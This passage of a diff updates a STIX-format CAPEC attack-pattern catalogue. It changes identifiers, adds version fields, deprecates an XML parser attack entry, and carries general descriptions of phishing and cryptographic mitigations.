"attack-pattern--8767e72d-72a4-42d9-a7ec-c03a0776ab7d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-97-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "\n Ensure that the algorithms are used properly. That means:\n \n \n 1. Not rolling out your own crypto; Use proven algorithms and implementations.\n 2. Choosing initialization vectors with sufficiently random numbers\n 3. Generating key material using good sources of randomness and avoiding known weak keys\n 4. Using proven protocols and their implementations.\n 5. Picking the most appropriate cryptographic algorithm for your usage context and data\n \n \n ", "type": "course-of-action", - "id": "course-of-action--bdcddc1e-bf58-45cb-8e8d-51559ab1c97e" + "id": "course-of-action--76fd685c-7ff0-4dcf-98bd-9f3317f37a1f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f38fdc26-7b62-4cb9-a42d-ea1216a8e0ba", - "source_ref": "course-of-action--bdcddc1e-bf58-45cb-8e8d-51559ab1c97e", + "id": "relationship--1163325b-6a63-4c5a-8d83-3e55abb1b32e", + "source_ref": "course-of-action--76fd685c-7ff0-4dcf-98bd-9f3317f37a1f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e85823f0-23de-409f-a629-8138dad396d7" + "target_ref": "attack-pattern--8767e72d-72a4-42d9-a7ec-c03a0776ab7d" }, { "name": "Phishing", "description": "Phishing is a social engineering technique where an attacker masquerades as a legitimate entity with which the victim might do business in order to prompt the user to reveal some confidential information (very frequently authentication credentials) that can later be used by an attacker. Phishing is essentially a form of information gathering or \"fishing\" for information.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -46315,31 +47048,32 @@ "John gets an official looking e-mail from his bank stating that his or her account has been temporarily locked due to suspected unauthorized activity and that John needs to click on the link included in the e-mail to log in to his bank account in order to unlock it. The link in the e-mail looks very similar to that of his bank and once the link is clicked, the log in page is the exact replica. John supplies his login credentials after which he is notified that his account has now been unlocked and that everything is fine. An attacker has just collected John's online banking information which can now be used by him or her to log into John's bank account and transfer John's money to a bank account of the attackers' choice." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--c1754ead-4fbf-4abb-8f3a-17ca7a5351c4" + "id": "attack-pattern--b96ebe51-105b-4b19-990a-adeb6336a84a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--dc45a9f1-f682-40aa-bb8a-85ae32ab3af8", - "source_ref": "course-of-action--28667398-23dc-4797-98a8-57760e50172f", + "id": "relationship--c32edb27-a6bf-4699-a91b-d5af0ea4c945", + "source_ref": "course-of-action--925956b6-2678-4433-9afe-3074a2ec9305", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c1754ead-4fbf-4abb-8f3a-17ca7a5351c4" + "target_ref": "attack-pattern--b96ebe51-105b-4b19-990a-adeb6336a84a" }, { - "name": "XML Parser Attack", - "description": "This attack pattern has been deprecated as it a generaltion of CAPEC-230: XML Nested Payloads and CAPEC-231: XML Oversized Payloads. Please refer to these CAPECs going forward.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "name": "DEPRECATED: XML Parser Attack", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads and CAPEC-231: XML Oversized Payloads. Please refer to these CAPECs going forward.", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -46349,11 +47083,12 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Deprecated", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--ccdb1313-d411-4dec-bf47-967183074c8c" + "id": "attack-pattern--4f6e2713-e1e5-472a-a3fb-a561029a7c70" } ], "type": "bundle", - "id": "bundle--2e1efa7e-40c4-436b-a66f-aa11b7df0656", + "id": "bundle--4a764d86-ecc2-4231-b01b-59bb81de2c45", "spec_version": "2.0" } \ No newline at end of file